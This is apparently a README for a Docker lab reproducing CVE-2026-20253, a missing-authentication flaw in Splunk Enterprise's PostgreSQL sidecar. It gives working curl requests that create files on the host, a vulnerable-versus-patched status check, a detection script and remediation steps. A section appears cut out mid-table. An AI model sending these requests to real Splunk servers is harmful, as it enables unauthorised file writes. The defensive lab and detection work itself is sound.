Exploit for Missing Authentication for Critical Function in Splunk CVE-2026-20253

Name: Exploit for Missing Authentication for Critical Function in Splunk CVE-2026-20253
Rating: 5 (11 reviews)
2026-06-29 | CVSS 9.8
## https://sploitus.com/exploit?id=EA243E1F-DDE9-5EB3-8E35-B0B053C11F4E
# CVE-2026-20253 — Splunk Enterprise Pre-Auth RCE Lab

> **Unauthenticated Arbitrary File Creation and Truncation via PostgreSQL Sidecar**  
> CVSS 9.8 · Critical · CWE-306 · Actively exploited (CISA KEV)

---

## ⚠️ Disclaimer

This repository is intended **strictly for educational and authorised security research purposes**.  
All testing must be performed against infrastructure you own or have explicit written permission to test.  
The authors accept no liability for misuse of the techniques or tooling demonstrated here.  
**Never run this against production systems or environments you do not own.**

---

## Overview

CVE-2026-20253 affects Splunk Enterprise versions below **10.2.4** and **10.0.7**.  
The PostgreSQL sidecar service bundled with Splunk exposes two internal HTTP endpoints:

```
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore
```

Both endpoints **lack any authentication check (CWE-306)**, meaning any network-reachable attacker can invoke them without credentials. By supplying an attacker-controlled `backupFile` parameter, an unauthenticated user can create or truncate arbitrary files on the Splunk host filesystem — a primitive that researchers have chained into full pre-authentication Remote Code Execution.

| Property        | Detail                                      |
|-----------------|---------------------------------------------|
| CVE             | CVE-2026-20253                              |
| CVSS Score      | 9.8 (Critical)                              |
| CWE             | CWE-306 — Missing Authentication for Critical Function |
| Affected        | Splunk Enterprise 10.0.x  Both containers can run side-by-side — ports are offset to avoid conflicts.

---

## Testing

### Test vulnerable instance → expect HTTP 400

```bash
curl -sk -X POST   "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"
```

**Expected: `400`** — endpoint exists, no authentication was enforced, request was processed.

Verify the file was created inside the container:

```bash
docker exec splunk-cve-2026-20253 ls -la /tmp/poc
```

---

### Test patched instance → expect HTTP 401

```bash
curl -sk -X POST   "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"
```

**Expected: `401`** — authentication is now enforced, request rejected.

---

### Response code reference

| HTTP Status | Meaning                                      |
|-------------|----------------------------------------------|
| `400`       | **Vulnerable** — endpoint hit, no auth check |
| `401`       | **Patched** — authentication enforced        |
| `404`       | Sidecar not present / wrong path             |
| `000`       | Container not ready yet                      |

---

### Optional: watchTowr scanner

The watchTowr Labs team published a detection script that automates the above check:

```bash
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000
```

---

## Stopping the lab

```bash
# Stop vulnerable
docker compose -f docker-compose.yml down

# Stop patched
docker compose -f patched-docker-compose.yml down
```

---

## Remediation

Update to a fixed version immediately:

| Branch | Fixed Version |
|--------|--------------|
| 10.2.x | **10.2.4**   |
| 10.0.x | **10.0.7**   |

If you cannot patch immediately, disable the PostgreSQL sidecar by adding the following to `server.conf` and restarting Splunk:

```ini
[postgres]
disabled = true
```

> ⚠️ Do not disable the sidecar if you are running Edge Processor or SPL2 data pipelines — it is required for those features.

---

## References

- 🔴 **Splunk Official Advisory** — [SVD-2026-0603](https://advisory.splunk.com/advisories/SVD-2026-0603)
- 🔬 **watchTowr Labs Research & Detection Tool** — [github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253](https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253/)
- 📋 **CISA KEV Entry** — [cisa.gov/known-exploited-vulnerabilities-catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- 📰 **The Hacker News Write-up** — [Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication](https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html)

---

## Legal

This lab environment is provided for **defensive security research and education only**.  
Unauthorised access to computer systems is illegal under the Computer Fraud and Abuse Act (CFAA), the UK Computer Misuse Act, and equivalent legislation worldwide.  
Use responsibly.